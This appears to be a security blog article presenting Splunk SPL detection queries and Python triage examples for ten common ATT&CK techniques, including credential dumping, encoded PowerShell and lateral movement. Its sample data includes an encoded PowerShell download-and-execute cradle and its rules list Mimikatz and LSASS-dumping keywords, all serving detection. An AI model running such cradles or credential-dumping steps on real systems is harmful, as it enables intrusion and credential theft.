Splunk SPL Detection Queries for the 10 ATT&CK Techniques You Actually See
MITRE ATT&CK has 200+ techniques. You do not need detections for all of them. Red Canary's 2025 Threat Detection Report found that 10 techniques account for 80% of observed adversary behavior across enterprise incident investigations.
This guide gives you the Splunk SPL query for each of those 10 techniques: what data source you need enabled, the query itself, what a real detection looks like, and how to tune it so you are not drowning in false positives on day one.
All queries assume Windows Event Log and Sysmon data in Splunk. The Sysmon configuration that produces the required events is noted for each query. If you are not running Sysmon, the SwiftOnSecurity Sysmon config is the recommended starting point.
T1059: Command and Scripting Interpreter (PowerShell, cmd, WMI)
The most observed technique every year. Attackers use built-in interpreters to avoid dropping files and to blend in with legitimate administration.
Data sources needed: Sysmon Event ID 1 (Process Create), Windows Event ID 4104 (PowerShell Script Block Logging)
Query 1: Encoded PowerShell commands (common for obfuscation)
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
| where like(lower(CommandLine), "%-enc%") OR like(lower(CommandLine), "%-encodedcommand%") OR like(lower(CommandLine), "%-ec %")
| where like(lower(ParentImage), "%winword%") OR like(lower(ParentImage), "%excel%") OR like(lower(ParentImage), "%outlook%") OR like(lower(ParentImage), "%iexplore%") OR like(lower(ParentImage), "%chrome%") OR like(lower(ParentImage), "%firefox%")
| table _time, ComputerName, User, ParentImage, CommandLine, Image
| sort -_time
```
Why the parent process filter: encoded PowerShell from Office apps or browsers is nearly always malicious. Encoded PowerShell from SCCM, Ansible, or other management tools is common and legitimate. Note that like() is case-sensitive in SPL and Sysmon records Office binaries in upper case (WINWORD.EXE, EXCEL.EXE), so compare against lower(ParentImage) and lower(CommandLine) rather than the raw fields.
Query 2: PowerShell downloading and executing content
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-PowerShell/Operational"
EventCode=4104
| where like(lower(Message), "%downloadstring%") OR like(lower(Message), "%downloadfile%") OR like(lower(Message), "%iex%") OR like(lower(Message), "%invoke-expression%") OR like(lower(Message), "%webclient%")
| table _time, Computer, Message
| sort -_time
```
False positives: Software deployment scripts, SCCM/Intune policies, developer tooling. Tune by building an allowlist of known-good parent processes and script paths.
Tuning tip: Start with the parent process filter (ParentImage from Office/browser apps) before enabling the encoded command detection broadly. This reduces false positives by 90% in most environments.
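As an added illustration (not part of the original article), the Python below applies the same two rules to constructed Sysmon EID 1 records and decodes the -EncodedCommand payload so an analyst can see what was run. The `_enc` helper, sample paths and the example.invalid URL are constructed; the regex also accepts the shorter -e/-en prefixes that powershell.exe allows, which the queries above do not list.

```python
import base64
import re

# Constructed sample Sysmon EID 1 records (not real telemetry). Encoded payloads
# are built from plaintext here so the sample stays readable.
def _enc(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"ParentImage": r"C:\Windows\CCM\CcmExec.exe",  # SCCM client: an expected source of encoded commands
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + _enc("Get-Service | Out-Null")},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; match case-insensitively.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
SUSPICIOUS_PARENTS = ("winword", "excel", "outlook", "iexplore", "chrome", "firefox")
# Same download-cradle terms as Query 2; "iex" is a substring match and may need tuning.
CRADLE_TERMS = ("downloadstring", "downloadfile", "iex", "invoke-expression", "webclient")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # -EncodedCommand is base64 over UTF-16LE text
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Apply the parent-process rule (Query 1) and the cradle rule (Query 2) to one event."""
    script = decode_encoded_command(event["CommandLine"])
    parent = event["ParentImage"].lower()
    suspicious_parent = any(p in parent for p in SUSPICIOUS_PARENTS)
    cradle = script is not None and any(t in script.lower() for t in CRADLE_TERMS)
    return {
        "encoded": script is not None,
        "suspicious_parent": suspicious_parent,
        "cradle": cradle,
        "script": script,
        "alert": script is not None and (suspicious_parent or cradle),
    }


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```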
T1003: OS Credential Dumping (LSASS Access, Mimikatz)
Credential dumping from LSASS is the prerequisite for pass-the-hash and pass-the-ticket attacks. Mimikatz is the most common tool; comsvcs.dll is the most common living-off-the-land technique.
Data sources needed: Sysmon Event ID 10 (Process Access)
Query 1: Suspicious LSASS memory access
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=10
TargetImage="*lsass.exe"
| where (GrantedAccess="0x1010" OR GrantedAccess="0x1410" OR GrantedAccess="0x1fffff" OR GrantedAccess="0x1f1fff")
| where NOT (like(lower(SourceImage), "%\\msmpeng.exe") OR like(lower(SourceImage), "%\\svchost.exe") OR like(lower(SourceImage), "%\\taskmgr.exe") OR like(lower(SourceImage), "%\\csrss.exe") OR like(lower(SourceImage), "%\\wininit.exe") OR like(lower(SourceImage), "%\\wmiprvse.exe"))
| table _time, ComputerName, SourceImage, TargetImage, GrantedAccess, SourceUser
| sort -_time
```
Access masks explained: 0x1010 and 0x1410 are the minimum required for credential dumping via OpenProcess + ReadProcessMemory; both include PROCESS_VM_READ (0x10), which ReadProcessMemory needs. 0x1fffff is full access (PROCESS_ALL_ACCESS), nearly always malicious.
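Added example (not from the article): decoding GrantedAccess into individual process rights and testing for the PROCESS_VM_READ bit instead of matching an exact mask list. This generalizes the query above, since it also catches masks such as 0x1038 that the list does not, while still ignoring query-only handles (0x1400) that process-enumeration tools open. The sample events are constructed.

```python
# Process access rights from winnt.h (well-known constants).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
PROCESS_VM_READ = 0x0010

# Same source-process exclusions as Query 1 (matched on the file name only).
EXCLUDED_SOURCES = ("msmpeng.exe", "svchost.exe", "taskmgr.exe",
                    "csrss.exe", "wininit.exe", "wmiprvse.exe")

# Constructed Sysmon EID 10 records, not real telemetry.
SAMPLE_ACCESS = [
    {"SourceImage": r"C:\Users\Public\dump.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"SourceImage": r"C:\Program Files\Monitor\agent.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1400"},  # query-only handle: cannot read memory
]


def decode_mask(granted: str) -> list:
    """Expand a Sysmon GrantedAccess string (e.g. "0x1410") into named rights, lowest bit first."""
    mask = int(granted, 16)
    if mask == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def can_read_memory(granted: str) -> bool:
    """True if the handle carries PROCESS_VM_READ, regardless of the other bits."""
    return bool(int(granted, 16) & PROCESS_VM_READ)


def is_suspicious_lsass_access(event: dict) -> bool:
    """Query 1 logic with a bit test in place of the exact mask list."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return False
    src = event["SourceImage"].lower()
    if any(src.endswith("\\" + name) for name in EXCLUDED_SOURCES):
        return False
    return can_read_memory(event["GrantedAccess"])
```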
Query 2: comsvcs.dll MiniDump technique (lolbas credential dumping)
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
| where like(lower(CommandLine), "%comsvcs%") AND like(lower(CommandLine), "%minidump%")
| table _time, ComputerName, User, CommandLine, ParentImage
| sort -_time
```
Query 3: Mimikatz keyword detection in script block logging
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-PowerShell/Operational"
EventCode=4104
| where like(lower(Message), "%sekurlsa%") OR like(lower(Message), "%logonpasswords%") OR like(lower(Message), "%lsadump%") OR like(lower(Message), "%kerberos::ptt%") OR like(lower(Message), "%privilege::debug%")
| table _time, Computer, Message
| sort -_time
```
False positives: Endpoint security software, IT monitoring tools that enumerate processes. The SourceImage exclusions in Query 1 handle most cases. Any alert on comsvcs MiniDump is nearly always malicious and should be treated as high priority.
T1078: Valid Accounts (Credential Misuse Detection)
Attackers using valid stolen credentials is the hardest technique to detect because the activity looks legitimate by design. Behavioral analytics detect deviations from normal patterns.
Data sources needed: Windows Event ID 4624 (Logon), 4625 (Failed Logon), 4648 (Explicit Credential Logon)
Query 1: Logons from unexpected geographic locations (impossible travel)
```spl
index=windows EventCode=4624 Logon_Type=3
| iplocation Source_Network_Address
| bin _time span=1h
| stats values(Country) as countries, values(Source_Network_Address) as IPs, count by Account_Name, _time
| where mvcount(countries) > 1
| table _time, Account_Name, countries, IPs, count
```
Query 2: Spray attack detection (same password tried on many accounts)
```spl
index=windows EventCode=4625
| bin _time span=5m
| stats dc(Account_Name) as unique_accounts, count by Source_Network_Address, _time
| where unique_accounts > 20
| table _time, Source_Network_Address, unique_accounts, count
| sort -unique_accounts
```
Query 3: First-time logon from a workstation (lateral movement indicator)
```spl
index=windows EventCode=4624 Logon_Type=3
| stats earliest(_time) as first_seen, count by Account_Name, ComputerName
| where first_seen > relative_time(now(), "-24h@h")
| eval first_seen=strftime(first_seen, "%Y-%m-%d %H:%M:%S")
| table first_seen, Account_Name, ComputerName, count
| sort -count
```
False positives: Users traveling, VPN endpoint changes, scheduled tasks. The impossible travel query requires iplocation, which needs a properly installed GeoIP database. Query 3 only identifies genuinely new account/host pairs if the search range extends well beyond 24 hours (for example 30 days), because earliest(_time) is computed over the searched range only. Build a home-base lookup table for accounts with known valid remote access.
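Added example (not from the article): Query 1 and Query 2 expressed as the same windowed aggregations in Python over constructed 4624/4625 records, so the thresholds can be exercised offline. The GEOIP dictionary is a constructed stand-in for iplocation; the IPs are documentation ranges.

```python
from collections import defaultdict

# Constructed 4625 records (epoch seconds), not real telemetry: 25 accounts from one
# source within 50 seconds, plus one unrelated failure from a second source.
FAILED_LOGONS = [
    {"_time": 1_700_000_000 + i * 2, "Account_Name": f"user{i:02d}",
     "Source_Network_Address": "203.0.113.9"}
    for i in range(25)
] + [{"_time": 1_700_000_030, "Account_Name": "jdoe", "Source_Network_Address": "198.51.100.4"}]

# Constructed 4624 Logon_Type 3 records: jdoe appears from two countries in one hour.
NETWORK_LOGONS = [
    {"_time": 1_700_000_100, "Account_Name": "jdoe", "Source_Network_Address": "198.51.100.4"},
    {"_time": 1_700_001_000, "Account_Name": "jdoe", "Source_Network_Address": "203.0.113.9"},
    {"_time": 1_700_000_200, "Account_Name": "asmith", "Source_Network_Address": "198.51.100.4"},
]

# Stand-in for the iplocation GeoIP lookup (constructed mapping).
GEOIP = {"198.51.100.4": "US", "203.0.113.9": "DE"}


def _bucket(t: int, span_s: int) -> int:
    """Equivalent of `bin _time span=...`: floor the timestamp to the span."""
    return t - t % span_s


def detect_password_spray(events, span_s=300, threshold=20):
    """Distinct accounts per source IP per 5-minute bin (Query 2)."""
    buckets = defaultdict(set)
    for e in events:
        buckets[(_bucket(e["_time"], span_s), e["Source_Network_Address"])].add(e["Account_Name"])
    return [{"_time": t, "Source_Network_Address": ip, "unique_accounts": len(accts)}
            for (t, ip), accts in sorted(buckets.items()) if len(accts) > threshold]


def detect_impossible_travel(events, span_s=3600):
    """Accounts seen from more than one country inside one hourly bin (Query 1)."""
    seen = defaultdict(lambda: {"countries": set(), "IPs": set()})
    for e in events:
        ip = e["Source_Network_Address"]
        rec = seen[(_bucket(e["_time"], span_s), e["Account_Name"])]
        rec["countries"].add(GEOIP.get(ip, "unknown"))
        rec["IPs"].add(ip)
    return [{"_time": t, "Account_Name": a, "countries": sorted(r["countries"]), "IPs": sorted(r["IPs"])}
            for (t, a), r in sorted(seen.items()) if len(r["countries"]) > 1]


if __name__ == "__main__":
    print(detect_password_spray(FAILED_LOGONS))
    print(detect_impossible_travel(NETWORK_LOGONS))
```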
T1021: Remote Services (PsExec, WMI, RDP Lateral Movement)
Lateral movement via built-in remote services is how attackers move through an environment after initial access. PsExec, WMI, and RDP are the three most common vectors.
Data sources needed: Sysmon Event ID 1, Windows Event ID 4688, 4624, 7045
Query 1: PsExec execution detection
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
| where (like(lower(Image), "%psexec%") OR like(lower(Image), "%psexesvc%")) OR (like(CommandLine, "%-s %") AND like(CommandLine, "%-i %") AND like(lower(ParentImage), "%services.exe%"))
| table _time, ComputerName, User, Image, CommandLine, ParentImage
| sort -_time
```
Query 2: Suspicious service installation via SCM (PsExec signature)
```spl
index=windows EventCode=7045
| where like(ServiceFileName, "%\\Windows\\Temp%") OR like(ServiceFileName, "%\\Users\\Public%") OR like(ServiceFileName, "%\\AppData\\Local\\Temp%")
| table _time, ComputerName, ServiceName, ServiceFileName, ServiceType
| sort -_time
```
Legitimate services are not installed from temp directories. This query has near-zero false positives in most environments.
Query 3: WMI remote execution
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
ParentImage="*WmiPrvSE.exe"
| where NOT (like(lower(Image), "%\\svchost.exe") OR like(lower(Image), "%\\wmiprvse.exe"))
| table _time, ComputerName, User, ParentImage, Image, CommandLine
| sort -_time
```
False positives for WMI query: Management tools (SCCM, Tanium, monitoring agents) use WMI extensively. Build an allowlist of known management server source IPs and filter them out.
T1543: Create or Modify System Process (Persistence via Services)
Attackers create Windows services or scheduled tasks to maintain persistence across reboots. New services in unusual locations are nearly always malicious.
Data sources needed: Windows Event ID 7045 (Service Installed), 4698 (Scheduled Task Created), Sysmon Event ID 1
Query 1: New service created from unusual path
```spl
index=windows EventCode=7045
| where NOT (like(ServiceFileName, "%\\Windows\\System32%") OR like(ServiceFileName, "%\\Windows\\SysWow64%") OR like(ServiceFileName, "%\\Program Files%") OR like(ServiceFileName, "%\\Program Files (x86)%"))
| table _time, ComputerName, ServiceName, ServiceFileName, ServiceStartType
| sort -_time
```
Query 2: Scheduled task created by unexpected process
```spl
index=windows EventCode=4698
| eval TaskContent=Message
| where NOT (like(TaskContent, "%\\Windows\\System32%") OR like(TaskContent, "%\\Program Files%"))
| table _time, ComputerName, SubjectUserName, TaskName, TaskContent
| sort -_time
```
Query 3: Registry run key modification (startup persistence)
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=13
| where (like(TargetObject, "%Run\\%") OR like(TargetObject, "%RunOnce\\%"))
AND (like(TargetObject, "%HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion%") OR like(TargetObject, "%HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion%"))
| where NOT (like(lower(Image), "%\\svchost.exe") OR like(lower(Image), "%\\msmpeng.exe"))
| table _time, ComputerName, User, Image, TargetObject, Details
| sort -_time
```
False positives: Software installers add services and run keys. Filter by known installer processes (msiexec.exe, setup.exe from program files paths) and by time of day (software deployments happen during business hours or maintenance windows).
T1055, T1105, T1204: Process Injection, Ingress Tool Transfer, User Execution
T1055: Process Injection -- Suspicious CreateRemoteThread
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=8
| where NOT (SourceImage=TargetImage)
| where NOT (like(SourceImage, "%svchost.exe") OR like(SourceImage, "%MsMpEng.exe") OR like(SourceImage, "%csrss.exe"))
| where like(TargetImage, "%lsass.exe") OR like(TargetImage, "%winlogon.exe") OR like(TargetImage, "%explorer.exe") OR like(TargetImage, "%notepad.exe")
| table _time, ComputerName, SourceImage, TargetImage, NewThreadId
| sort -_time
```
T1105: Ingress Tool Transfer -- Downloads to suspicious locations
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=11
| where (like(TargetFilename, "%\\Temp\\%.exe") OR like(TargetFilename, "%\\Temp\\%.ps1") OR like(TargetFilename, "%\\Temp\\%.bat") OR like(TargetFilename, "%\\Downloads\\%.exe"))
AND (like(Image, "%powershell%") OR like(Image, "%certutil%") OR like(Image, "%bitsadmin%") OR like(Image, "%curl.exe") OR like(Image, "%wget.exe"))
| table _time, ComputerName, User, Image, TargetFilename
| sort -_time
```
T1204: User Execution -- Office macro launching process
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
| where (like(lower(ParentImage), "%winword.exe") OR like(lower(ParentImage), "%excel.exe") OR like(lower(ParentImage), "%powerpnt.exe") OR like(lower(ParentImage), "%outlook.exe"))
AND (like(lower(Image), "%cmd.exe") OR like(lower(Image), "%powershell.exe") OR like(lower(Image), "%wscript.exe") OR like(lower(Image), "%cscript.exe") OR like(lower(Image), "%mshta.exe"))
| table _time, ComputerName, User, ParentImage, Image, CommandLine
| sort -_time
```
T1204 from Office has very low legitimate use. Any Office app spawning cmd or PowerShell is suspicious and should alert at high priority.
Enabling Sysmon and Tuning These Queries
Sysmon event IDs required for these queries:
| Event ID | Event type | Required for |
|---|---|---|
| 1 | Process Create | T1059, T1021, T1543, T1204 |
| 8 | CreateRemoteThread | T1055 |
| 10 | ProcessAccess | T1003 |
| 11 | FileCreate | T1105 |
| 13 | Registry value set | T1543 |
Minimum Sysmon configuration:
The SwiftOnSecurity Sysmon config (github.com/SwiftOnSecurity/sysmon-config) is the community standard starting point. Deploy it via Group Policy:
```powershell
# Install Sysmon with config
Sysmon64.exe -accepteula -i sysmonconfig.xml
# Update config without restart
Sysmon64.exe -c sysmonconfig.xml
# Verify it is running
Get-Service Sysmon64
```
Alert volume management:
Do not enable all 10 detection queries simultaneously. Start with:
- T1003 LSASS access query (near-zero false positives, extremely high value)
- T1204 Office spawning shell (near-zero false positives in most environments)
- T1543 service from unusual path (near-zero false positives)
Get those three tuned and generating reliable alerts before adding the higher-volume queries (T1059 encoded PowerShell, T1078 logon analytics).
Building an allowlist workflow:
For each query, run it in a search mode for 7 days before enabling alerting. Export the results and categorize: legitimate software vs. suspicious. Add legitimate software to a lookup table and reference it in the query:
```spl
| lookup allowlisted_processes.csv Image OUTPUT allowed
| where isnull(allowed)
```
This pattern -- run for a week in observe mode, build the allowlist, then enable alerting -- reduces false positive rates by 80-90% compared to enabling alerts immediately.
The bottom line
Detection engineering is not about coverage breadth -- it is about depth and fidelity on the techniques that actually appear in your environment. These 10 techniques will account for the majority of real detections you fire in the next 12 months. Get these working, tuned, and generating reliable alerts before expanding to less common techniques. A SIEM that generates 50 reliable, actionable alerts per week is more valuable than one generating 500 alerts where 490 are noise.
Frequently asked questions
Do these queries work without Sysmon?
Partially. The queries using Windows Event IDs (4624, 4625, 4648, 4698, 7045) work with standard Windows event logging. The queries using Sysmon Event IDs (1, 8, 10, 11, 13) require Sysmon to be installed and configured. Sysmon provides significantly more detail than native Windows logging -- especially for process creation (CommandLine, ParentImage, Hashes) and process access (GrantedAccess, SourceImage). If you cannot deploy Sysmon org-wide, prioritize it on domain controllers, servers, and executive endpoints first.
What is the best free Sysmon configuration to start with?
The SwiftOnSecurity sysmon-config on GitHub is the community standard starting point. It provides comprehensive coverage without flooding your SIEM with excessive event volume. Olaf Hartong's sysmon-modular configuration is a more advanced option that provides a modular structure for tuning individual event categories. For most organizations, SwiftOnSecurity is the right starting point; sysmon-modular makes sense once you are ready to tune event volume per category.
How do I convert these Splunk queries to Microsoft Sentinel or Elastic?
Microsoft Sentinel uses KQL (Kusto Query Language); the logic is the same but the syntax differs. The Sigma community has converted many of these detection patterns to Sigma rules, which can be compiled to Splunk SPL, KQL, Elastic EQL, QRadar, and other SIEM syntaxes using sigma-cli. The SigmaHQ repository contains hundreds of detection rules for all these techniques in vendor-neutral Sigma format. For direct Sentinel equivalents, the Microsoft Sentinel GitHub repository contains KQL hunting queries for all MITRE ATT&CK techniques.
What is the difference between these detection queries and an EDR?
EDR agents (CrowdStrike, SentinelOne, Microsoft Defender) run these same behavioral detections on the endpoint itself in real time. SIEM-based detections are retrospective -- they fire based on log data that arrives minutes or hours after the event. The advantage of SIEM-based detection: centralized visibility across all endpoints in one query, ability to correlate events across multiple systems (e.g., T1078 impossible travel requires correlating logon events across all hosts), and no agent dependency. Run both where possible: EDR for real-time endpoint response, SIEM for cross-environment correlation and hunting.
How do I know if these queries would have detected a specific attack?
Use Atomic Red Team (github.com/redcanaryco/atomic-red-team) to simulate each ATT&CK technique in a test environment and verify your detections fire. Atomic Red Team provides ready-to-run test scripts for every technique. After running each atomic test, confirm the corresponding Splunk query returns results. This gives you empirical evidence of detection coverage rather than theoretical assessment. Run atomic tests quarterly after tuning changes to confirm coverage has not degraded.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.